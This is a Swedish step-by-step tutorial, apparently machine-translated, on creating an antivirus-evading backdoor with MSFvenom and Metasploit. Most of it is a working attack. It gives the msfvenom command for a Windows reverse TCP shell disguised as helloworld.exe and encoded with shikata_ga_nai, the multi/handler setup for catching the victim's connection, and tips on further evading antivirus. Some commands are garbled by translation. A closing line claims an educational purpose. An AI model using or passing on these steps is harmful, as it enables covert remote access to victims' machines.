Hur skapar jag en nästan oupptäckbar bakdörr med MSFvenom i Kali Linux?
En bakdörr används för att kringgå säkerhetsmekanismer, ofta i hemlighet och mest påvisbart. Med hjälp av MSFvenom, kombinationen av msfpayload och msfencode, är det möjligt att skapa en bakdörr som ansluter tillbaka till angriparen genom att använda omvänd skal TCP. För att utveckla en bakdörr måste du ändra signaturen för din skadlig kod för att undvika antivirusprogram. Slutför detta projekt på ett par datorer som du har behörighet att komma åt, och under tiden lär du dig mer om datasäkerhet och hur denna typ av bakdörr fungerar.
- 1Starta kali och skjut upp terminalen.
- 2Skriv för ifconfig att visa gränssnittet och kontrollera din IP-adress.
- 3Skriv för msfvenom -l encoders att visa listan med kodare.
- Du kommer att använda x86/shikata_ga_nai som kodare.
- 4Skriv "msfvenom -a x86 - plattformsfönster -p windows / shell / reverse_tcp LHOST = 192,168.48,129 lport = 4444 -b" \ x00" -e x86 / shikata_ga_nai -f exe> helloworld.exe
- -a x86 - platform windows anger arkitektur som ska användas.
- -p windows/shell/reverse_tcp anger de nyttolast som ska bädda in.
- LHOST anger lyssnarens IP-adress.
- LPORT anger lyssnarporten.
- -b "\x00" anger för att undvika dålig karaktär (null byte).
- -e x86/shikata_ga_nai anger kodarnas namn.
- -f exe > helloWorld.exe anger formatutmatning.
- 5Skriv för msfconsole att aktivera metasploit.
- Nu har du skapat din bakdörr. När offret klickar på helloWorld.exe aktiveras den inbäddade skalbelastningen och gör en anslutning tillbaka till ditt system. För att ta emot anslutningen måste du öppna multihanteraren i Metasploit och ställa in nyttolasten.
- 6Typ use exploit/multi/handler.
- 7Typ set payload windows/shell/reverse_tcp.
- 8Skriv för show options att kontrollera modulen.
- 9Typ set LHOST 192,168.48,129.
- "LHOST" anger lyssnarens IP-adress.
- 10Typ set LPORT 4444.
- "LPORT" anger lyssnarporten.
- 11Skriv run och vänta på anslutningen från offrets maskin.
- 12Vänta på att offret klickar på helloworld.exe. Då kommer du att anslutas till offrets maskin.
- Användning av -i <nummer> i MSFvenom representerar de iterationer som kodningen gör. Ibland kan fler iterationer hjälpa till att undvika AV-programvaran.
- Du har lärt dig hur man skapar bakdörren och kodas med MSFvenom, men den här metoden fungerar inte perfekt mot en del av AV-programvaran idag. Anledningen till detta är på grund av exekveringsmallarna i MSFvenom. AV-leverantörerna har lagt till den statiska signaturen för dessa mallar och letar bara efter dem. Lösningen för det här problemet är att använda en annan exekveringsmall eller andra verktyg.
- Denna artikel är endast avsedd för utbildning. Hackning utan tillstånd eller tillstånd är oetiskt och ofta olagligt.
- Kali Linux
- Windows
- Virtuell maskin
- VirtualBox
- VMware
Frågor och svar
- Vad gör jag om ett fel dyker upp när jag skapar exploateringen?Se till att du gjorde allt korrekt och försök igen. Se till att du kör Kali Linux.